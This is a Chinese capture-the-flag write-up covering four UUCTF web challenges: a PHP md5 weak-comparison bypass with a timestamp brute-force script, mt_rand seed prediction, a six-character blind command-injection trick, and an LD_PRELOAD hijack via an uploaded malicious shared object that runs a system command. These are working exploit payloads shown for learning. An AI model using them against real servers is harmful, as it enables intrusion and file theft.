UUCTF部分web题解

前言

这次比赛结束有一段时间了，在此总结一些当时没有做出来的web题解。也当是收集到一些学习经验。

funmd5（php代码审计）

打开题目，是一段php代码：

1.  
   <?php
2.  
   error_reporting(0);
3.  
   include "flag.php";
4.  
   $time=time();
5.  
   $guessmd5=md5($time);
6.  
   $md5=$_GET["md5"];
7.  
   if(isset($md5)){
8.  
   $sub=substr($time,-1);
9.  
   $md5=preg_replace('/^(.*)0e(.*)$/','${1}no_science_notation!${2}',$md5);
10.  
    if(preg_match('/0e/',$md5[0])){
11.  
    $md5[0]=substr($md5[0],$sub);
12.  
    if($md5[0]==md5($md5[0])&&$md5[1]===$guessmd5){
13.  
    echo "well!you win again!now flag is yours.<br>";
14.  
    echo $flag;
15.  
    }
16.  
    else{
17.  
    echo $md5[0];
18.  
    echo "oh!no!maybe you need learn more PHP!";
19.  
    }
20.  
    }
21.  
    else{
22.  
    echo "this is your md5:$md5[0]<br>";
23.  
    echo "maybe you need more think think!";
24.  
    }
25.  
    }
26.  
    else{
27.  
    highlight_file(__FILE__);
28.  
    $sub=strlen($md5[0]);
29.  
    echo substr($guessmd5,0,5)."<br>";
30.  
    echo "plase give me the md5!";
31.  
    }
32.  
    ?>

当时困扰我的是数组的传参问题，现在也算是明白了。get传值，代码很容易读懂，看第一层限制：

$md5=preg_replace('/^(.*)0e(.*)$/','${1}no_science_notation!${2}',$md5);

不想0e被替换，那么用 换行绕过就行了，那么看第二层限制：

1.  
   $time=time();
2.  
   $guessmd5=md5($time);
3.  
   $sub=substr($time,-1);
4.  
   $md5[0]=substr($md5[0],$sub);
5.  
   if($md5[0]==md5($md5[0])&&$md5[1]===$guessmd5){

time函数返回时间戳，找一个字符串的md5值等于它本身，来满足第一个弱比较，但是在此之前会对md5[0]有一个截取操作，从哪截取与时间戳的最后一个数字有关，先不用管，看第二个满足条件，需要去强等时间戳的md5值，那么我们可以卡个满足条件的时间手动发包，但是比较考验手速，用python发包更加的稳。

1.  
   import requests
2.  
   import hashlib
3.  
   import time
4.  
    
5.  
   for i in range(10000):
6.  
   times = str(int(time.time()))
7.  
   md5 = hashlib.md5(times.encode())
8.  
   md5value = md5.hexdigest()
9.  
   url = "http://43.143.7.97:28023/index.php?md5[]= 0e215962017&md5[1]={}".format(md5value)
10.  
    res = requests.get(url=url)
11.  
    if "NSS" in res.text:
12.  
    print(res.text)
13.  
    break

也是很快得出flag了。

phonecode（随机数预测）

知道考预测随机数，但是不知道怎么解题。题目中给的hint是由我们提交的phone控制的，就用它给的hint来爆破随机数种子，并且在code那里填写下一个随机数就可以得到flag。但是我试了很多次，预测出的随机数都得不出flag，看了别的师傅写的wp，在phone提交12345678909后返回的随机数来预测下一个随机数才能得到flag。 why？

题目中的php版本为7.2，所以用最后一个随机数种子预测出随机数，

1.  
   <?php
2.  
   mt_srand(3755744317);
3.  
   for($i=0;$i<10;$i ){
4.  
   echo mt_rand()."\n";
5.  
   }
6.  
   ?>

 

最后提交预测的随机数就得出flag了。

ezrce（六字符无回显rce）

打开题目是一个命令执行接口，

 

限制了输入的字符最多为六个并且无回显，常规思路就是将命令执行结果写入文件，这一题比较坑的就是你命令执行成功了给你回显命令执行失败。并且写入的文件在tmp目录下。我们输入命令

ls />a

 访问tmp目录下的a文件

尝试构造命令nl /*>a，这是七个字符。还有个更巧妙的方法，创建一个名为nl的文件，再用*将文件名当作命令执行。payload为

1.  
   >nl
2.  
   * /*>a

 访问/tmp/a，成功得到flag。

uploadandinject（恶意so文件加载）

打开题目先信息收集，题目提示访问hint.php，

提示我们有index.php的swp文件泄露，在url访问.index.php.swp，（做题时前面没加点，一直访问错误）访问url下载好文件打开是有乱码的，所以我们得用vim来打开它，使用命令：

vim -r index.php.swp

 

 重点代码：

putenv("LD_PRELOAD=/var/www/html/$img_path");

它会将LD_PRELOAD环境变量指向我们可控的文件路径，一看见这个LD_PRELOAD环境变量，肯定就会想到让它来加载恶意so文件劫持函数执行命令。那么我们能够找到一个上传点去上传我们构造的恶意so代码，dirsearch扫一下目录，发现上传点upload/upload.php，

白名单限制，直接上传木马是不现实的，我们上传恶意so文件更改后缀名为jpg，对后续的加载是无影响的，但目前来说，还有一个点。一般情况来说，我们还需要再上传一个php文件，来让它调用mail这样的函数来开启一个新的进程，应为启动一个新的进程的时候，会去加载LD_PRELOAD指向的恶意so文件。很显然，上传点是上传不了php文件的，看了别的师傅写的wp，源代码中的

echo "<br><img src=$img_path>"

 这一句代码可以触发加载so文件（具体原因不明），那么说到这里，所有条件就满足，这里直接编写网上最流行通杀恶意c代码，

1.  
   #define _GNU_SOURCE
2.  
   #include <stdlib.h>
3.  
   #include <unistd.h>
4.  
   #include <sys/types.h>
5.  
    
6.  
   __attribute__ ((__constructor__)) void payload (void){
7.  
   unsetenv("LD_PRELOAD");
8.  
   system("cat /f*");
9.  
   }

使用命令将c文件加载为so文件：

gcc -shared -fPIC hacker.c -o hacker.so

接下来就上传so文件然后加载它就能执行system命令进而得出flag。

这篇好文章是转载于：学新通技术网